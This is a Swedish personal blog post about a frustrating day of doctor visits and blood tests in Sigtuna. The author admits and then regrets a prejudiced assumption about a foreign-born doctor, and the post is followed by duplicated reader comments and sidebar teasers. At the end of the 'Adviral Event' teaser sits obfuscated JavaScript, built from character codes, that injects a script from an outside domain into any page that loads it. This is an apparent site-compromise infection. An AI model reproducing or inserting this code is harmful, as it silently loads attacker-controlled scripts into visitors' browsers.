Biktar mig för mina rasistiska tankar!

IMG_4695

Hej fina  du!

Jag känns mig som 7 svåra år! Blek, svullen, matt, trött, orkeslös….. MEN på benen och fortfarande feberfri! 😉 Det går framåt…

Idag var jag hos doktorn. Första gången på ny vårdcentral, med ny doktor.  (för mig)

Jag blev på dåligt humör redan när jag kom dit. Jag åkte 30 min innan jag skulle vara där. (Ifall jag inte skulle hitta) Satte mig i bilen och slog in adressen på gps:n. HAHAHA 350m hemifrån mig! HUR har jag kunnat missa detta!?! 

Jag gick in på vårdcentralen för att anmäla mig. Fyllde i papprean och blev ombedd att vänta på dr ”gud vet hur namnet uttalas”  Jag retade mig på att det var en utländsk doktor som jag skulle vänta på ( jag är absolut INTE rasist) men sist förstod jag inte vad doktorn sa. Det har hänt FLERA gånger! Jag har INGENTING emot utländska doktorer. (jag är bara halvt svensk själv) MEN jag förutsätter att dom pratar svenska  så att man förstår varandra som patient och doktor!

-Håller du med mig om att våra doktorer ska kunna prata svenska?

 Så frustrationen över att kanske inte göra mig förstådd fick mitt humör att nästan koka över. Jag retade mig på det minimala väntrummet.  jag retade mig på tapeten. jag retade mig på allt. Jag satt själv i väntrummet då kom det in en förvirrad tant som började fråga mig hon hon var rätt. Jag irriterade mig på henne också.

ja du svarade jag ganska kort,  jag vet inte om JAG är rätt. Shit! Vad är det för del på mig tänkte jag?!

Förlåt sa jag, snabbt. Du hade ont i foten… (det hade hon nämligen hunnit tala om) Vill du att jag går ut till receptionen och frågar om du är i rätt väntrum? Tanten berättade att hon inte kunde se färger därför hittade hon inte så bra… Jag fattade på två sekunder ett tycket för denna lilla söta tant. Vi pratade en stund och mitt extremt griniga humör försvann. Tillslut kom hennes doktorer och hämtade henne.  Min doktor dök upp först ett par minuter senare än avtalad tid ( vilket såklart också retande mig).

MEN Jag möttes utav en fantastisk doktor! Omtänksam, förstående, och fast beslutsam om att vi måste göra en ordentlig hälsoundersökning. Gode gud vad jag skämdes! Han pratade utmärkt svenska, (NÄSTAN BÄTTRE ÄN JAG SJÄLV… *FNISS )  jag skämdes över mina mörka tankar som jag bara några minuter tidigare hade haft.

Denna doktor gick igenom tidigare journaler och sjukdomsfall. Insåg att jag haft lunginflammation två gånger på ett år. Han tittade på mig, skakade på huvudet och förundrades över. lång diskussion senare och en snabbt blodprov på snabbänkan så hade han skrivit ner en lista 1-5 med saker vi ska börja utredningen med. Diabetes är uteslutet! SKÖNT!!!!!

Nu ska vi kolla upp min sköldkörtel, mina lungor, kortisol och det andra kommer jag inte ihåg. Ivrigt frågad Jag, hur? var? när?  JAG VILL VETA NU! Jag skulle direkt gå och ta ett blodprov på sköldkörtel. Men det skulle jag göra på ett laboratorium som vårdcentralen delar med Sigtuna Läkarhus.

okay svarade jag. Sigtuna läkarhus som nekat mig tider när jag varit som sjukast vid FLERA tillfällen. Dessutom när jag ordagrant bad på mina bara knän med feber på 40.5.  Sigtuna Läkarhus som inte hade tider för Ludvig när han var sjuk heller… okay. Dom verkar ha väldigt mycket att göra på sigtuna läkarhus. 

Sen ska jag gå till samma laboratorium imorgon bitti kl 08:00 och göra resterande blodprover på fastande mage… Glad och tacksam över engagemanget och förståelsen för att någonting är kraftigt fel så kände jag mig sååååå tacksam över att han var så beslutsam och målmedveten om att hitta felet/felen. han tog mig/situationen på alvar. Tack! Vilket gjorde att mina på gränsen till rasistiska tankar fick mig att rodna och skämmas genom att bli röd som en tomat! Men det kunde jag gott ha! Så nu, min vän använder jag faktist dig för att bikta mig 😉

Anyway… jag kom till Sigtuna Läkarhus. Gick in där för första gången. (har bara pratat med dom på telefon innan ) Frågade mig fram. Ingen visste.

Då gick en kvinna förbi och frågade om hon kunde hjälpa mig. Ja tack sirade jag desperat. Jag ska ta blodprov och har en remiss för att göra det här. Väntrummet är där borta pekade hon…. tack svarade jag och gick mot väntrummet. Då ropar hon efter mig. det är stängt. -va svarar jag? det måste vara fel, jag skulle gå hit nu… Okay svarade hon, då är det säkert så.

Förvirrad satte jag mig och väntade, ingen kom. Väntade lite till…. ingen kom. Hmm, då kom en kvinna, vad gör du här? jag ska lämna blodprov svarade jag, min doktor skickade hit mig. Vad heter doktorn frågade hon? satans j*vla skit, hur var det nu? vad hette han? jag kom inte på det. (där kom karman för mina hemska tankar) Jag förklarade vart jag kom ifrån.. hon svarade då kort, din läkare ska veta att vi har stängt nu! Oj, förlåt, jag visste inte. men finns det någon som kan ta ett blodprov? Hon började prata på om deras öppettider och jag kände hur mitt tålamod försvann! jag reste mig och lämnad lokalen mitt i hennes menig, Oartigt, men bättre än ett fullkomligt raseriutbrott!

Så inget prov lämnat ännu. Ska göra ett nytt försök imorgonbitti! SUCK!

Vad har jag lärt mig idag? Ja, att man inte ska ha förutfattade meningar om doktorer man inte träffat. Och att jag aldrig kommer att bli patient på Sigtuna läkarhus! ALDRIG!!!

När jag kom hem igen så var jag så trött att jag somnade och sov i TRE timmar! Sen hämtade jag lilleman. färdigmat från frysen. film och myskväll i soffan……

FullSizeRender 4

 

Minns ni att jag för några dagars sedan skrev om Italienska DL Sport sneakers? Jag skrev ju att dom skulle vara sommarens hetaste sneakers! Mycket riktigt har dom redan sålt slut, men nu kan man gå in och förbaka/förbeställa för nästa leverans. så vill man se till att man inte ska bli utan så förbokar du HÄR i did! 😉 Vi hörs imorgon! Efter blodprover och möte i stan….

Stor kram! / My Martens

24 Komentarer

 1. Blir så rädd när jag läser om din hälsa! Du vet väl om att det finns två typer av diabetes? Om du har gått ner i vikt, dricker mycket och är allmänt dåsig så lutar det mot typ 1. Detta tillstånd är allvarligt och jag skulle typ åka till akuten och be dem ta ett blodsocker. Det behöver inte vara på fastande mage… Hoppas så klart att det inte är det. Kram och kämpa på!<3

 2. Det låter ju toppenbra att en läkare tar tag i en utredning nu, mindre bra att de inte har koll på öppettider sinsemellan, ”suckar”.
  Förstår att du blev sne.
  Även jag har blivit sne på Märsta läkarvård och har bytt till UV.
  Ha en fin kväll och hoppas du kan sova ut och vakna pigg imorrn.
  Kramen // A-M

 3. Det är ju inte konstigt att du är på hugget och vill få svar på dina frågor och undringar. Vad skönt att din läkare tog det på allvar och gör en noggrann undersökning. Självklart ska en läkare prata bra svenska och både förstå vad man säger och göra sig själv förstådd. Det är superviktigt ! Sen bryr jag mig inte om det är en utländsk. Vad skönt att det inte var diabetes !

 4. Skönt att du mår bättre och att läkarbesöket gick bra! Eftersom att jag själv bor i Sigtuna kommun blir man ju lite nyfiken på vart du gick ?
  Må gott och det är så roligt att läsa din blogg
  Puss och kram skumbanan :))

 5. Blir så rädd när jag läser om din hälsa! Du vet väl om att det finns två typer av diabetes? Om du har gått ner i vikt, dricker mycket och är allmänt dåsig så lutar det mot typ 1. Detta tillstånd är allvarligt och jag skulle typ åka till akuten och be dem ta ett blodsocker. Det behöver inte vara på fastande mage… Hoppas så klart att det inte är det. Kram och kämpa på!<3

 6. Det låter ju toppenbra att en läkare tar tag i en utredning nu, mindre bra att de inte har koll på öppettider sinsemellan, ”suckar”.
  Förstår att du blev sne.
  Även jag har blivit sne på Märsta läkarvård och har bytt till UV.

  Ha en fin kväll och hoppas du kan sova ut och vakna pigg imorrn.

  Kramen // A-M

 7. Jag har världens bästa vårdcentral !! Trevliga, nybyggda lokaler, bra personal , till dr kommer man in på rätt tid,men den vc ligger i Småland

 8. Det är ju inte konstigt att du är på hugget och vill få svar på dina frågor och undringar. Vad skönt att din läkare tog det på allvar och gör en noggrann undersökning. Självklart ska en läkare prata bra svenska och både förstå vad man säger och göra sig själv förstådd. Det är superviktigt ! Sen bryr jag mig inte om det är en utländsk. Vad skönt att det inte var diabetes !

 9. Skönt att du mår bättre och att läkarbesöket gick bra! Eftersom att jag själv bor i Sigtuna kommun blir man ju lite nyfiken på vart du gick 🙂

  Må gott och det är så roligt att läsa din blogg

  Puss och kram skumbanan :))

 10. Jag har världens bästa vårdcentral !! Trevliga, nybyggda lokaler, bra personal , till dr kommer man in på rätt tid,men den vc ligger i Småland

 11. Jag hatar Sigtuna läkarhus. Otrevliga och dåliga med tider. Det enda är att BVC är väldigt bra där. Annars kan jag rekommendera din doktor på eurostop. Dom har dropin varje dag och jätte bra läkare.

 12. Jag hatar Sigtuna läkarhus. Otrevliga och dåliga med tider. Det enda är att BVC är väldigt bra där. Annars kan jag rekommendera din doktor på eurostop. Dom har dropin varje dag och jätte bra läkare.

 13. Trist att du fått så negativ bemötande av läkarhuset. Har shälv gått där i flera år och alltid fått bra hjälp.

 14. Sigtuna vårdcentral är toppen, låter som du fick samma läkare som hela min familj har. Han är toppen, tar sig verkligen tid och är noggrann.
  Krya på dig!

 15. Sigtuna vårdcentral är toppen, låter som du fick samma läkare som hela min familj har. Han är toppen, tar sig verkligen tid och är noggrann.
  Krya på dig!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/